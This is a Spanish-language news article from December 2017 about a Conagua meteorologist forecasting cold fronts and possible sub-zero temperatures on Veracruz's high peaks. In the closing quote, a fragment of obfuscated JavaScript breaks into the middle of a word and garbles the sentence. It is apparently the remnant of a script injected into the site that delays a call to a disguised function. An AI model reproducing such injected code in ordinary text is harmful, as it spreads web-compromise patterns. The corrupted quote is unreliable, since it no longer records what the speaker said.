Alertan por temperaturas abajo de los cero grados en zonas altas

1 diciembre, 2017

Yhadira Paredes. Xalapa. Durante el mes de diciembre se esperan temperaturas mínimas por abajo de la media, señaló la jefa del departamento de Meteorología de la Comisión Nacional del Agua (Conagua), Jessica Luna Lagunes, quien indicó que hasta el momento se han registrado 13 sistemas frontales (frentes fríos).

Asimismo, informó que este fin de semana no se descartan temperaturas por abajo de los cero grados en zonas como Huayacocotla, Cofre de Perote, Pico de Orizaba.

En su participación en la conferencia de cada viernes del Comité Estatal de Meteorología, señaló que para este último mes del año se prevén ocho frentes fríos, el mismo número que para el mes de enero; para febrero siete; marzo y abril seis y mayo dos.

La funcionaria federal recomendó a la población mantenerse al pendiente del pronostico del tiempo que emiten las autoridades oficiales para tomar las precauciones necesarias.

Jessica Luna informó que el frente frío número 13 se disipará en las próximas horas, pero se mantendrán las temperaturas bajas durante la noche y las madrugadas.

“Para hoy no se descartan en zonas de costa rachas de 30 a 40 kilómetros por hora, y la temperatura tendrá pocos cambios en relación a días pasados”.

En la zona norte las máximas serán de 29 a 32 grados Celsius y las mínimas de 18 a 20, con cielo despejado; en la zona de costa máximas de 28 a 31 mininas de 18 a 20; en el sur máximas de 29 a 32 y mínimas de 19 a 21; y en la zona de montaña se tendrán máximas de 22 a 24 y mínimas de 8 a 11 grados.

En la zona montañosa, las ciudades de Xalapa, Orizaba, Córdoba, destacó se esperan cielo despejado durante las mañanas y nieblas por la tarde y noche.

La especialista manifestó que se presentará un nuevo frente frío para mediados de la próxima semana que afectará al estado con bajas temperaturas importantes.

“Estará ocasionandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando un descenso importante de la temperatura y un evento del norte, por lo que hay que estar pendientes ante la actualización de la información”, finalizó la meteoróloga.